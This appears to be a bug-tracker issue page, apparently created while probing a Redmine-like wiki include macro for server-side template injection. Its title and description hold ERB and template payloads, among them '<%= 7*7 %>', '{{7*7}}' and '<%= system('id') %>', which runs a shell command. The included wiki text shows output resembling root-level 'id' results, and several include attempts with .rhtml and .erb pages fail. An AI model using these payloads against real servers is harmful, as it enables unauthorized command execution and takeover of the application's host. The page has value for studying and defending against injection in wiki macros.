Actions
Bug #118
openSSTI Test i044 <%= 7*7 %>
Status:
New
Priority:
Normal
Assignee:
-
Start date:
07/16/2026
Due date:
% Done:
0%
Estimated time:
Description
Include test with existing wiki:
include RceTest2 from project 3:
ERB/SSTI Injection Test\n\nERB test: <%= 7*7 %>\n\nERB test2: <%25= 7*7 %>\n\nSSTI Rails: {{7*7}}\n\nRuby eval: <%= system('id') %>\n\nTextile eval: <%= uid=0(root) gid=0(root) groups=0(root) %>¶
include from same project:
Error executing the include macro (Page not found)
include with .rhtml extension:
Error executing the include macro (Page not found)
include with .erb:
Error executing the include macro (Page not found)
Actions